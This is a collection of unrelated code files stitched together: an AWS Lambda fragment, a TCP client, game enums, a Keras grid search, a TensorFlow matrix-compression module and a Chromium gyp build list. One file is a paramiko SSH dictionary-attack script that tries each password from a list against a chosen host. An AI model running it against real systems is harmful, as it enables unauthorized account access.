    image_object = s3.Object(bucket_name=S3_BUCKET_NAME, key=news_story.thumbnail_key)
    image_object.put(Body=thumbnail)
    dynamo = DynamoDB(logger=LOGGER)
    dynamo.put_item(table_name=NEWS_STORIES_TABLE_NAME, item=cattrs.unstructure(news_story))
    # Response carries the thumbnail inline instead of the S3 key.
    story = cattrs.unstructure(news_story)
    del story["thumbnail_key"]
    story.update({"thumbnail": thumbnail})
    return Lambda.format_response(status_code=APIResponseCodes.OK, response_message=story)
|
import sys
from socket import *
# Line-oriented TCP client: each stdin line is sent to the server over a
# fresh connection; the server replies with a line count followed by that
# many lines, which are echoed to stdout.
for line in sys.stdin:
    # NOTE(review): lines from "for line in sys.stdin" always include the
    # trailing newline, so len(line) == 0 can only happen at EOF, which
    # already ends the loop -- this break looks unreachable.
    if len(line) == 0: break
    clientSocket = socket(AF_INET, SOCK_STREAM)
    hostPort = 15132
    host_name = "comp431bfa19"
    clientSocket.connect((host_name, hostPort))
    # Buffered text stream over the socket for line-based I/O.
    stream = clientSocket.makefile('rw')
    # write the input line to the server
    stream.write(line)
    stream.flush()
    # read the response lines from the server
    # (protocol: the first line carries the number of lines that follow)
    numberOfLines = stream.readline()
    # NOTE(review): this loop variable shadows the outer 'line'; harmless
    # because 'line' is rebound by the outer for before its next use.
    for line in range(int(numberOfLines)):
        response = stream.readline()
        sys.stdout.write(response)
    # close connection $
    clientSocket.close()
sys.exit()
|
from enum import Enum
from collections import namedtuple
# Which side of the connection a packet originated from.
class PacketProvenance(Enum):
    server = 0x01
    client = 0x02


# Special abilities of elite enemy ships. Values are distinct bits so
# several abilities can be packed into one bitmask.
# NOTE(review): enum.Flag would let members combine directly; kept as
# Enum to preserve the existing API.
class EliteAbility(Enum):
    stealth = 0x0001
    low_vis = 0x0002
    cloak = 0x0004
    het = 0x0008
    warp = 0x0010
    teleport = 0x0020
    tractor = 0x0040
    drones = 0x0080
    anti_mine = 0x0100
    anti_torp = 0x0200
    shield_drain = 0x0400


# Scenario type a game can be set up with.
class GameType(Enum):
    siege = 0
    single_front = 1
    double_front = 2
    deep_strike = 3
    peacetime = 4
    border_war = 5


# Bridge console / station a client can select.
class Console(Enum):
    main_screen = 0
    helm = 1
    weapons = 2
    engineering = 3
    science = 4
    comms = 5
    data = 6
    observer = 7
    captain_map = 8
    game_master = 9


# Availability of a console for the requesting client.
class ConsoleStatus(Enum):
    available = 0
    yours = 1
    unavailable = 2


# Kind of object appearing in the game world (value 8 is unused).
class ObjectType(Enum):
    player_vessel = 1
    weapons_console = 2
    engineering_console = 3
    other_ship = 4
    base = 5
    mine = 6
    anomaly = 7
    nebula = 9
    torpedo = 10
    blackhole = 11
    asteroid = 12
    mesh = 13
    monster = 14
    whale = 15
    drone = 16


# Propulsion system of a vessel.
class DriveType(Enum):
    warp = 0
    jump = 1


# Hull class of a player vessel.
class ShipType(Enum):
    light_cruiser = 0
    scout = 1
    battleship = 2
    missile_cruiser = 3
    dreadnought = 4


# Per-ship configuration: drive type, hull type and display name.
ShipSettingsRecord = namedtuple('ShipSettingsRecord', 'drive type name')


# Camera/view shown on the main screen.
class MainView(Enum):
    forward = 0
    port = 1
    starboard = 2
    aft = 3
    tactical = 4
    lrs = 5
    status = 6


# Loading state of a weapons tube.
class TubeStatus(Enum):
    unloaded = 0
    loaded = 1
    loading = 2
    unloading = 3


# Ordnance that can be loaded into a tube.
class OrdnanceType(Enum):
    missile = 0
    nuke = 1
    mine = 2
    emp = 3
|
from random import randint
class Food:
    """A circular food pellet drawn on a canvas.

    Tracks its centre, radius, colour, point value and decay rate, and
    owns the oval item it draws on the canvas.
    """

    def __init__(self, canvas, x, y, r=10, color="green", points=1, decay=0):
        self.x = x
        self.y = y
        self.r = r
        self.color = color
        self.points = points
        self.decay = decay
        self.init_body(canvas)

    def init_body(self, canvas):
        """Draw the pellet as a filled oval and remember its canvas item id."""
        bbox = (self.x - self.r, self.y - self.r,
                self.x + self.r, self.y + self.r)
        self.circle = canvas.create_oval(*bbox, fill=self.color)

    def self_destruct(self, canvas):
        """Remove the pellet's oval from the canvas."""
        canvas.delete(self.circle)

    def get_coords(self):
        """Return the pellet's centre as an (x, y) tuple."""
        return (self.x, self.y)

    def end_epoch(self, canvas, new_x, new_y):
        """Erase the pellet and redraw it at a new position."""
        self.self_destruct(canvas)
        self.x, self.y = new_x, new_y
        self.init_body(canvas)
import numpy as np
from keras import callbacks
from keras.optimizers import SGD
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import GridSearchCV
"""
This script is used to create models and determine hyperparameters
such as batch size, training epochs, and loss functions by gridsearch.
For this purpose, the Basemodel class is used to create models and the
TestSetCreator-class is used to load the data
"""
def create_model(optimizer='rmsprop', img_width=150, img_height=150):
    """Build and compile a small CNN for the grid search.

    NOTE(review): each conv spec appears to be [filters, kernel_w,
    kernel_h, activation, pool, stride] and each fully connected spec
    [units, activation, dropout] -- confirm against BaseModel.createModel.

    Args:
        optimizer: keras optimizer name or instance. Defaults to 'rmsprop'.
        img_width (int): input image width. Defaults to 150.
        img_height (int): input image height. Defaults to 150.

    Returns:
        Compiled keras model with categorical cross-entropy loss.
    """
    convlayer1 = [16, 3, 3, 'relu', 2, 1]
    convlayer2 = [16, 3, 3, 'relu', 2, 1]
    convlayer3 = [16, 3, 3, 'relu', 0, 1]
    convlayer4 = [16, 3, 3, 'relu', 2, 1]
    convolutional_layers = []
    convolutional_layers.append(convlayer1)
    convolutional_layers.append(convlayer2)
    convolutional_layers.append(convlayer3)
    convolutional_layers.append(convlayer4)
    fully_connceted_layers = []
    fc1 = [128, 'relu', .2]
    fc2 = [64, 'relu', .1]
    fully_connceted_layers.append(fc1)
    fully_connceted_layers.append(fc2)
    # Imported lazily so the module can be imported without this package.
    from testcode.base_model import BaseModel
    model_creator = BaseModel()
    model = model_creator.createModel(img_width, img_height, 1, convolutional_layers, fully_connceted_layers)
    model.compile(optimizer=optimizer, loss='categorical_crossentropy', metrics=['accuracy'])
    return model
def create_dataset(data_dir, img_width, img_height):
    """Load, normalize and split the image data; return the training fold.

    Args:
        data_dir (str): directory containing the image data.
        img_width (int): target image width.
        img_height (int): target image height.

    Returns:
        tuple: (X_train, y_train) training images and labels. The test
        fold is discarded because GridSearchCV does its own validation.
    """
    # Imported lazily so the module can be imported without this package.
    from utils.create_test_sets import TestSetCreator
    testset_creator = TestSetCreator()
    images, labels = testset_creator.load_data(data_dir, img_width, img_height)
    images, labels = testset_creator.normalize_data(images, labels)
    # Fold index 0 of the cross-validation split.
    X_train, X_test, y_train, y_test = testset_creator.cross_validate(images, labels, 0)
    return X_train, y_train
def create_callbacks():
    """Create training callbacks: LR reduction and TensorBoard logging.

    Returns:
        list: [ReduceLROnPlateau, TensorBoard]
    """
    # Cut the learning rate to 20% after 5 epochs without val_loss
    # improvement, but never below 1e-5.
    reduce_lr = callbacks.ReduceLROnPlateau(monitor='val_loss', factor=0.20,
                                            patience=5, min_lr=0.00001)
    tensorboard = callbacks.TensorBoard(log_dir='./logs',
                                        histogram_freq=0,
                                        batch_size=16,
                                        embeddings_freq=0,
                                        embeddings_layer_names=None,
                                        embeddings_metadata=None)
    return [reduce_lr, tensorboard]
# Build the training set and wrap the model factory for scikit-learn.
X_train, y_train = create_dataset('C:\\tmp\\test', 150, 150)
model = KerasClassifier(build_fn=create_model, verbose=0)
# Define the hyperparameters to test in the grid search.
optimizers = [SGD(lr=0.001, momentum=0.9), 'adam']
epochs = [100, 200, 300]
batches = [8, 16, 32, 64]
param_grid = dict(optimizer=optimizers, epochs=epochs, batch_size=batches)
grid = GridSearchCV(estimator=model, param_grid=param_grid)
grid_result = grid.fit(X_train, y_train)
# Report the best configuration, then every configuration's mean/std score.
print("Best: %f using %s" % (grid_result.best_score_, grid_result.best_params_))
means = grid_result.cv_results_['mean_test_score']
stds = grid_result.cv_results_['std_test_score']
params = grid_result.cv_results_['params']
for mean, stdev, param in zip(means, stds, params):
    print("%f (%f) with: %r" % (mean, stdev, param))
|
# coding=utf-8
# Copyright 2022 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Matrix compression operator.
Helper functions to have an automated process to take any matrix compression
algorithm and create a tensorflow operator that can be applied on a tensorflow
matrix variable to compress it on the fly during training.
The class MatrixCompressorInferface can be used to implement any matrix
compression algorithm in the method static_matrix_compressor. The other class
CompressionOpInterface is used to create a tensorflow operator that injects
any matrix compression method dynamically into a tensorflow layer. This is
done by specifying in the spec during initialization a
MatrixCompressorInferface object that implements the method.
The get_apply_compression_op return such a tensorflow operator.
Further a tensorflow operator to update variables needs to be invoked
periodically depending on the method. Such an operator is created using
the get_update_op method.
Derived classes of these interfaces can be used to create compression OPs that
implement different compression methods. Such OPs have been implemented using
derived classes such as LowRankDecompMatrixCompressor, CompressionOp for low
rank decomposition, SimhashMatrixCompressor, SimhashCompressionOp for simhash,
DLMatrixCompressor for dictionary learning.
"""
import copy
from absl import logging
import numpy as np
from tensor2tensor.utils.hparam import HParams
import tensorflow.compat.v2 as tf
class MatrixCompressorInferface(object):
  """Interface for any matrix compressor algorithm.

  This MatrixCompressorInferface class can be implemented by any third party to
  implement any compression algorithm.

  NOTE(review): "Inferface" (sic) is the established public name of this
  class; renaming it would break existing subclasses and imports.
  """

  def __init__(self, spec):
    # The base interface keeps no state; subclasses interpret `spec`.
    pass

  def static_matrix_compressor(self, a_matrix):
    """Implements the matrix compression algorithm of choice to compress.

    Args:
      a_matrix: input matrix.

    Returns:
      The factor(s) or any compressed representation of a_matrix.
    """
    raise NotImplementedError()

  def default_matrix(self):
    """Returns default matrix for initialization.

    Size is taken from spec.
    """
    raise NotImplementedError()
class LowRankDecompMatrixCompressor(MatrixCompressorInferface):
  """Low rank decomposition compressor.

  Implements the matrix compression interface using a truncated-SVD
  (low-rank) factorization of the input matrix.
  """

  def __init__(self, spec):
    """Initializer.

    Args:
      spec: hparams object with default value given by
        self.get_default_hparams().
    """
    super(LowRankDecompMatrixCompressor, self).__init__(spec)
    self._spec = spec
    self.uncompressed_size = 0
    self.compressed_size = 0

  def get_spec(self):
    """Returns the hparams spec this compressor was configured with."""
    return self._spec

  @staticmethod
  def get_default_hparams():
    """Get a tf.HParams object with the default values for the hyperparameters.

    name: string
      name of the low-rank matrix decompressor specification.
    rank: integer
      rank of the low-rank decomposition that is performed.
    compressor_option: integer
      indicates what type of factorization (if any) is used.
    is_b_matrix_trainable: bool
      indicates whether the b_matrix matrix in the factorization is to be
      trained.
    is_c_matrix_trainable: bool
      indicates whether the c_matrix matrix in the factorization is to be
      trained.

    Returns:
      tf.HParams object initialized to default values.
    """
    return HParams(
        name='model_compression',
        rank=100,
        num_rows=10,
        num_cols=10,
        use_tpu=False,
        compressor_option=0,
        is_b_matrix_trainable=True,
        is_c_matrix_trainable=True,
        is_c_matrix_present=True,
        block_size=1,
        pruning_fraction=0.0,
        use_lsh=False)

  def static_matrix_compressor(self, a_matrix):
    """Low-rank decomposition of a_matrix via truncated SVD.

    Args:
      a_matrix: input matrix.

    Returns:
      A list [b_matrix, c_matrix] which is the low-rank decomposition of
      a_matrix. Rank is taken from spec.rank, clamped to the smaller
      matrix dimension.
    """
    left_factors, singular_values, right_factors = np.linalg.svd(a_matrix)
    # Clamp the requested rank to the smaller matrix dimension, keeping at
    # least rank 1.
    effective_rank = max(min(np.min(a_matrix.shape), self._spec.rank), 1)
    # Split sqrt(S) evenly between the two factors so that
    # b_matrix @ c_matrix reconstructs U[:, :r] S[:r] Vh[:r, :].
    sqrt_s = np.diag(np.sqrt(singular_values[:effective_rank]))
    b_matrix = np.matmul(left_factors[:, :effective_rank], sqrt_s)
    c_matrix = np.matmul(sqrt_s, right_factors[:effective_rank, :])
    logging.info(
        'Inside static_matrix_compressor: a_matrix,b_matrix,c_matrix shapes '
        'are: %s, %s, %s', a_matrix.shape, b_matrix.shape, c_matrix.shape)
    # NOTE(review): uncompressed_size is a tf scalar while compressed_size is
    # a plain int — mirrors the original behavior; confirm callers expect it.
    self.uncompressed_size = tf.size(a_matrix)
    self.compressed_size = b_matrix.size + c_matrix.size
    return [b_matrix, c_matrix]
class CompressionOpInterface(object):
  """Interface for a compression op.

  Concrete subclasses take a matrix compression algorithm (described by a
  MatrixCompressorInferface object in the spec) and expose TensorFlow
  operators that inject that compression into training dynamically.
  """

  def __init__(self, scope='default_scope', spec=None, global_step=None):
    pass

  def get_apply_compression_op(self,
                               a_matrix_tfvar,
                               matrix_compressor,
                               scope='default_scope'):
    """Returns a TF node holding the compressed version of a_matrix_tfvar.

    Args:
      a_matrix_tfvar: TF variable representing a tensor variable in a model.
      matrix_compressor: MatrixCompressorInferface object to specify the
        compression algorithm.
      scope: TF scope used for creating new TF variables.

    Returns:
      A TF node that has the compressed version of a_matrix_tfvar.
    """
    raise NotImplementedError()

  def get_update_op(self):
    """Returns a TF operator to be invoked periodically for updates."""
    raise NotImplementedError()
class CompressionOp(CompressionOpInterface):
  """Implements a compression OP.

  Does this based on any matrix factorization compression algorithm by
  replacing a variable a_matrix by alpha*a_matrix +
  (1-alpha)b_matrix*c_matrix. See the doc linked in the directory README for
  details.
  """

  def __init__(self,
               scope='default_scope',
               spec=None,
               global_step=None,
               layer=None):
    """Initializer.

    Args:
      scope: TF scope used for creating new TF variables.
      spec: compression hyper parameters default value given by
        self.get_default_hparams().
      global_step: tf variable that has the global step.
      layer: Layer to compress.
    """
    super(CompressionOp, self).__init__(scope, spec, global_step)
    # Compression specification
    self._spec = spec
    # Sanity check for compression hparams
    self._validate_spec()
    self._global_step = global_step
    # public member variables to track the compressor, the variables and
    # other tf nodes corresponding to this OP.
    self.matrix_compressor = None
    self.a_matrix_tfvar = None
    self.b_matrix_tfvar = None
    self.c_matrix_tfvar = None
    self.alpha = None
    self.layer = layer
    self.last_alpha_update_step = None
    self.uncompressed_size = 0
    self.compressed_size = 0

  @staticmethod
  def get_default_hparams():
    """Get a tf.HParams object with the default values for the hyperparameters.

    name: string
      name of the compression specification. Used for adding summaries and ops
      under a common tensorflow name_scope.
    alpha_decrement_value: float
      a positive real number by which alpha is decremented at each update.
    begin_compression_step: integer
      the global step at which to begin compression.
    end_compression_step: integer
      the global step at which to terminate compression. Defaults to -1
      implying that compression continues till the training stops.
    use_tpu: False
      indicates whether to use TPU.
    compression_option: integer
      indicates what type of factorization (if any) is used.
    rank: integer
      indicates what type of factorization (if any) is used.
    update_option: integer
      indicates how the update logic is being run. More specifically:
      0 - run the update logic in TF; needed when using GPU/TPU.
      1 - run the update logic in regular python as opposed to TF.
      2 - run the update logic in TF and in regular python.

    Returns:
      tf.HParams object initialized to default values.
    """
    return HParams(
        name='model_compression',
        alpha_decrement_value=0.01,
        begin_compression_step=0,
        end_compression_step=-1,
        compression_frequency=10,
        use_tpu=False,
        compression_option=0,
        rank=100,
        update_option=0,
        run_update_interval_check=1,
        block_size=1,
        pruning_fraction=0.0,
        begin_pruning_step=0,
        end_pruning_step=-1,
        weight_sparsity_map=[''],
        block_dims_map=[''],
        threshold_decay=0.0,
        pruning_frequency=10,
        nbins=256,
        block_height=1,
        block_width=1,
        block_pooling_function='AVG',
        initial_sparsity=0.0,
        target_sparsity=0.5,
        sparsity_function_begin_step=0,
        sparsity_function_end_step=100,
        sparsity_function_exponent=3.0,
        gradient_decay_rate=0.99,
        prune_option='weight')

  def setup_variables(self, a_matrix_tfvar, matrix_compressor, layer):
    """Create compressed layer weight matrices."""
    self.matrix_compressor = matrix_compressor
    # Compress an all-zero matrix of the same shape purely to discover the
    # shapes of the b/c factors for this layer's kernel.
    a_matrix = np.zeros(shape=a_matrix_tfvar.shape)
    [b_matrix, c_matrix] = matrix_compressor.static_matrix_compressor(a_matrix)
    # The b/c factors reuse the layer's own initializer/regularizer/constraint
    # so they behave like ordinary kernel weights.
    self.b_matrix_tfvar = layer.add_weight(
        'b_matrix',
        shape=b_matrix.shape,
        initializer=layer.kernel_initializer,
        regularizer=layer.kernel_regularizer,
        constraint=layer.kernel_constraint,
        dtype=layer.dtype,
        trainable=True)
    self.c_matrix_tfvar = layer.add_weight(
        'c_matrix',
        shape=c_matrix.shape,
        initializer=layer.kernel_initializer,
        regularizer=layer.kernel_regularizer,
        constraint=layer.kernel_constraint,
        dtype=layer.dtype,
        trainable=True)
    # alpha starts at 1 (pure original matrix) and is decremented during
    # training by _update_alpha_op; it is not trained by the optimizer.
    self.alpha = layer.add_weight(
        'alpha',
        shape=(),
        initializer=tf.keras.initializers.Ones(),
        dtype=layer.dtype,
        trainable=False)
    # -1 marks "no alpha update has happened yet".
    self.last_alpha_update_step = layer.add_weight(
        'last_alpha_update_step',
        shape=(),
        initializer=tf.keras.initializers.Constant(value=-1),
        dtype=tf.int32,
        trainable=False)
    self.a_matrix_tfvar = a_matrix_tfvar
    self.layer.alpha = self.alpha

  def compressed_matmul_keras(self, inputs, training=False):
    """Matmul with a convex combination of original and compressed weights."""
    if training:
      # alpha*A + (1-alpha)*B*C: blends the original kernel with the factored
      # approximation while alpha anneals from 1 to 0.
      compressed_mat = self.alpha * self.a_matrix_tfvar + (
          1 - self.alpha) * tf.matmul(self.b_matrix_tfvar, self.c_matrix_tfvar)
      return tf.matmul(inputs, compressed_mat)
    else:
      # This prevents the TFLite converter from constant-folding the product of
      # B & C matrices.
      intermediate = tf.matmul(inputs, self.b_matrix_tfvar)
      return tf.matmul(intermediate, self.c_matrix_tfvar)

  def maybe_run_update_step(self):
    """Creates TensorFlow update op for compression."""

    def maybe_update_alpha():
      """Maybe update the alpha param.

      Checks if global_step is between begin_compression_step and
      end_compression_step, and if the current training step is a
      compression step.

      Returns:
        Boolean tensor whether the training step is a compression step.
      """
      is_step_within_compression_range = tf.logical_and(
          tf.greater_equal(
              tf.cast(self._global_step, tf.int32),
              self._spec.begin_compression_step),
          tf.logical_or(
              tf.less_equal(
                  tf.cast(self._global_step, tf.int32),
                  self._spec.end_compression_step),
              # end_compression_step < 0 means compress until training stops.
              tf.less(self._spec.end_compression_step, 0)))
      # Due for an update once compression_frequency steps have elapsed since
      # the last alpha update.
      is_compression_step = tf.less_equal(
          tf.add(self.last_alpha_update_step, self._spec.compression_frequency),
          tf.cast(self._global_step, tf.int32))
      return tf.logical_and(is_step_within_compression_range,
                            is_compression_step)

    def no_update_op():
      # False branch of the cond: intentionally a no-op.
      pass

    def compressor_and_alpha_update_op_fn():
      return self._compressor_and_alpha_update_op()

    # NOTE(review): both branches return None, so tf.cond is used here purely
    # for its side effects (variable assignments) — confirm this is intended.
    tf.cond(
        pred=maybe_update_alpha(),
        true_fn=compressor_and_alpha_update_op_fn,
        false_fn=no_update_op)
    return

  def _compressor_op(self, matrix_compressor, a_matrix_tfvar):
    """Creates compressor op based on matrix_compressor.

    Meant to create the factors once at begin_compression_step.

    Args:
      matrix_compressor: specifies the matrix compressor object.
      a_matrix_tfvar: the tf tensor to be compressed.
    """
    # py_function lets the numpy-based compressor run on the tensor; the two
    # float32 outputs are the b and c factors.
    [b_matrix_out, c_matrix_out
    ] = tf.compat.v1.py_function(matrix_compressor.static_matrix_compressor,
                                 [a_matrix_tfvar], [tf.float32, tf.float32])
    self.b_matrix_tfvar.assign(b_matrix_out)
    self.c_matrix_tfvar.assign(c_matrix_out)
    return

  def _update_alpha_op(self):
    """Decrements alpha by alpha_decrement_value and clamps it at zero."""
    # NOTE(review): the extra positional 0 binds to assign_sub's use_locking
    # parameter — presumably unintended (harmless since 0 is falsy); confirm.
    self.alpha.assign_sub(self._spec.alpha_decrement_value, 0)
    self.alpha.assign(tf.math.maximum(self.alpha, 0))
    return

  def _compressor_and_alpha_update_op(self):
    """Applies compressor and also updates alpha."""
    self._compressor_op(self.matrix_compressor, self.a_matrix_tfvar)
    self._update_alpha_op()
    # Record when this update happened so maybe_update_alpha can gate the
    # next one by compression_frequency.
    self.last_alpha_update_step.assign(tf.cast(self._global_step, tf.int32))

  def _validate_spec(self):
    """Raises ValueError if the compression step range in the spec is invalid."""
    spec = self._spec
    if spec.begin_compression_step < 0:
      raise ValueError('Illegal value for begin_compression_step')
    if spec.begin_compression_step >= spec.end_compression_step:
      # end_compression_step == -1 is the sentinel for "never stop".
      if spec.end_compression_step != -1:
        raise ValueError(
            'Compression must begin before it can end. begin_step=%d, '
            'end_step=%d. Set end_compression_step to -1 if compression is '
            'required till training stops' %
            (spec.begin_compression_step, spec.end_compression_step))
class ApplyCompression(object):
  """Driver that applies the compression operator to several model layers.

  Initialized by specifying the compressor and compression_spec. After that,
  apply_compression_keras can be called repeatedly for different matrices in
  the model; all_update_op returns the combined update OP from all these
  compressions.
  """

  def __init__(self, scope, compression_spec, compressor, global_step=None):
    """Initializer.

    Args:
      scope: TF scope used for creating new TF variables.
      compression_spec: compression hyper parameters.
      compressor: matrix compressor object of class MatrixCompressorInferface.
      global_step: tf variable that has the global step.
    """
    logging.info('Entering ApplyCompression constructor')
    self._scope = scope
    self._compression_op_spec = compression_spec
    self._matrix_compressor = compressor
    self._global_step = global_step
    self._compression_ops = []
    self._update_ops = []
    self._all_update_op = None
    self.uncompressed_size = 0
    self.compressed_size = 0

  def apply_compression_keras(self,
                              a_matrix_tfvar,
                              scope='default_scope',
                              layer=None):
    """keras version of apply_compression.

    Wraps a_matrix_tfvar in a CompressionOp configured from the stored spec.

    Args:
      a_matrix_tfvar: TF variable representing a tensor variable in a model.
      scope: TF scope used for creating new TF variables.
      layer: keras layer object calling this function. Must support an
        add_weight method.

    Returns:
      TF node that represents the compressed version of a_matrix_tfvar.
    """
    # Option 9 (input compression) has no keras implementation yet.
    if self._compression_op_spec.compression_option == 9:
      raise NotImplementedError('InputCompression not Supported.')
    compression_op = CompressionOp(
        scope=scope,
        spec=self._compression_op_spec,
        global_step=self._global_step,
        layer=layer)
    compression_op.setup_variables(
        a_matrix_tfvar, self._matrix_compressor, layer=layer)
    return compression_op

  def get_operator_hparam(self, hparam):
    """Returns the value of queried hparam of the compression operator."""
    return self._compression_op_spec.get(hparam)

  def get_compression_ops(self):
    """Returns a shallow copy of the compression operators created so far.

    Returns:
      A list of CompressionOp objects.
    """
    return copy.copy(self._compression_ops)

  def get_spec(self):
    """Get the spec / hparams used to create the Pruning object."""
    return self._compression_op_spec
|
# Libraries
import paramiko
# Global attempt counter shared with connectSSH (module-level state).
count = 1
def connectSSH(hostname: str, port: int, username: str, passFile: str) -> None:
    """Try each password in passFile against hostname:port over SSH.

    Stops at the first successful login and prints the working credentials.

    NOTE(review): this is a password-guessing (dictionary-attack) helper —
    it must only be run against systems you are explicitly authorized to
    test. Also note the SSH client is never closed after a successful login.

    Args:
        hostname: target host to connect to.
        port: SSH port on the target.
        username: account name to authenticate as.
        passFile: path to a newline-separated password list.
    """
    client = paramiko.SSHClient()
    # Auto-accept unknown host keys so the first connection does not fail
    # on host-key verification.
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    with open(passFile, "r") as f:
        # Uses the module-level attempt counter defined above.
        global count
        for password in f.readlines():
            password = password.strip()
            try:
                client.connect(hostname, port=port, username=username, password=password)
                print("[" + str(count) + "] " + "[+] Password Success ~ " + password)
                print("*" * 50)
                print("HostName: " + hostname)
                print("UserName: " + username)
                print("Password: " + password)
                print("*" * 50)
                # Stop at the first password that works.
                break
            except:
                # NOTE(review): bare except also hides network/connection
                # errors, not just failed logins — consider narrowing to
                # paramiko.AuthenticationException.
                print("[" + str(count) + "] " + "[-] Password Failed ~ " + password)
            count += 1
# Prompt for target details and start the password-guessing loop on the
# default SSH port (22).
hostname = input("[*] Enter HostName: ")
username = input("[*] Enter UserName: ")
passwordFile = input("[*] Enter Passwords File: ")
connectSSH(hostname, 22, username, passwordFile)
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
{
'variables': {
'chromium_code': 1,
},
'targets': [
{
# GN version: //ios/chrome/app
'target_name': 'ios_chrome_app',
'type': 'static_library',
'include_dirs': [
'../..',
],
'dependencies': [
'../../base/base.gyp:base',
'ios_chrome_browser',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/UIKit.framework',
],
},
'sources': [
'app/UIApplication+ExitsOnSuspend.h',
'app/UIApplication+ExitsOnSuspend.mm',
'app/deferred_initialization_runner.h',
'app/deferred_initialization_runner.mm',
'app/safe_mode_crashing_modules_config.h',
'app/safe_mode_crashing_modules_config.mm',
'app/safe_mode_util.cc',
'app/safe_mode_util.h',
],
},
{
# GN version: //ios/chrome/browser
'target_name': 'ios_chrome_browser',
'type': 'static_library',
'include_dirs': [
'../..',
],
'dependencies': [
'../../base/base.gyp:base',
'../../base/base.gyp:base_prefs',
'../../breakpad/breakpad.gyp:breakpad_client',
'../../components/components.gyp:language_usage_metrics',
'../../components/components.gyp:about_handler',
'../../components/components.gyp:autofill_core_browser',
'../../components/components.gyp:autofill_core_common',
'../../components/components.gyp:autofill_ios_browser',
'../../components/components.gyp:bookmarks_browser',
'../../components/components.gyp:browser_sync_browser',
'../../components/components.gyp:browser_sync_common',
'../../components/components.gyp:certificate_reporting',
'../../components/components.gyp:component_updater',
'../../components/components.gyp:content_settings_core_browser',
'../../components/components.gyp:cookie_config',
'../../components/components.gyp:crash_core_browser',
'../../components/components.gyp:crash_core_common',
'../../components/components.gyp:data_reduction_proxy_core_browser',
'../../components/components.gyp:data_reduction_proxy_core_common',
'../../components/components.gyp:dom_distiller_core',
'../../components/components.gyp:dom_distiller_ios',
'../../components/components.gyp:domain_reliability',
'../../components/components.gyp:enhanced_bookmarks',
'../../components/components.gyp:favicon_base',
'../../components/components.gyp:favicon_core',
'../../components/components.gyp:gcm_driver',
'../../components/components.gyp:google_core_browser',
'../../components/components.gyp:history_core_browser',
'../../components/components.gyp:history_ios_browser',
'../../components/components.gyp:infobars_core',
'../../components/components.gyp:invalidation_impl',
'../../components/components.gyp:invalidation_public',
'../../components/components.gyp:keyed_service_core',
'../../components/components.gyp:keyed_service_ios',
'../../components/components.gyp:leveldb_proto',
'../../components/components.gyp:metrics',
'../../components/components.gyp:metrics_net',
'../../components/components.gyp:metrics_profiler',
'../../components/components.gyp:metrics_services_manager',
'../../components/components.gyp:metrics_ui',
'../../components/components.gyp:net_log',
'../../components/components.gyp:network_time',
'../../components/components.gyp:ntp_snippets',
'../../components/components.gyp:omnibox_browser',
'../../components/components.gyp:open_from_clipboard',
'../../components/components.gyp:password_manager_core_browser',
'../../components/components.gyp:password_manager_sync_browser',
'../../components/components.gyp:pref_registry',
'../../components/components.gyp:proxy_config',
'../../components/components.gyp:rappor',
'../../components/components.gyp:search',
'../../components/components.gyp:search_engines',
'../../components/components.gyp:security_interstitials_core',
'../../components/components.gyp:security_state',
'../../components/components.gyp:sessions_ios',
'../../components/components.gyp:signin_core_browser',
'../../components/components.gyp:signin_core_common',
'../../components/components.gyp:signin_ios_browser',
'../../components/components.gyp:ssl_config',
'../../components/components.gyp:suggestions',
'../../components/components.gyp:sync_driver',
'../../components/components.gyp:syncable_prefs',
'../../components/components.gyp:translate_core_browser',
'../../components/components.gyp:translate_ios_browser',
'../../components/components.gyp:undo_component',
'../../components/components.gyp:update_client',
'../../components/components.gyp:upload_list',
'../../components/components.gyp:variations',
'../../components/components.gyp:variations_service',
'../../components/components.gyp:version_info',
'../../components/components.gyp:version_ui',
'../../components/components.gyp:web_resource',
'../../components/components.gyp:webdata_services',
'../../components/components.gyp:webp_transcode',
'../../components/components_resources.gyp:components_resources',
'../../components/components_strings.gyp:components_strings',
'../../google_apis/google_apis.gyp:google_apis',
'../../net/net.gyp:net',
'../../skia/skia.gyp:skia',
'../../sync/sync.gyp:sync',
'../../third_party/google_toolbox_for_mac/google_toolbox_for_mac.gyp:google_toolbox_for_mac',
'../../ui/base/ui_base.gyp:ui_base',
'../../ui/gfx/gfx.gyp:gfx',
'../../url/url.gyp:url_lib',
'../provider/ios_provider_chrome.gyp:ios_provider_chrome_browser',
'../web/ios_web.gyp:ios_web',
'injected_js',
'ios_chrome_browser_about_flags',
'ios_chrome_common',
'ios_chrome_resources.gyp:ios_chrome_resources',
'ios_chrome_resources.gyp:ios_chrome_ui_string_overrider_factory',
'ios_chrome_resources.gyp:ios_chrome_ui_string_overrider_factory_gen',
],
'export_dependent_settings': [
'../../components/components.gyp:dom_distiller_core',
],
'link_settings': {
'libraries': [
'$(SDKROOT)/System/Library/Frameworks/Accelerate.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreGraphics.framework',
'$(SDKROOT)/System/Library/Frameworks/CoreLocation.framework',
'$(SDKROOT)/System/Library/Frameworks/Foundation.framework',
'$(SDKROOT)/System/Library/Frameworks/QuartzCore.framework',
'$(SDKROOT)/System/Library/Frameworks/UIKit.framework',
],
},
'sources': [
'browser/app_startup_parameters.h',
'browser/app_startup_parameters.mm',
'browser/application_context.cc',
'browser/application_context.h',
'browser/application_context_impl.cc',
'browser/application_context_impl.h',
'browser/arch_util.cc',
'browser/arch_util.h',
'browser/autocomplete/autocomplete_classifier_factory.cc',
'browser/autocomplete/autocomplete_classifier_factory.h',
'browser/autocomplete/autocomplete_provider_client_impl.cc',
'browser/autocomplete/autocomplete_provider_client_impl.h',
'browser/autocomplete/autocomplete_scheme_classifier_impl.h',
'browser/autocomplete/autocomplete_scheme_classifier_impl.mm',
'browser/autocomplete/in_memory_url_index_factory.cc',
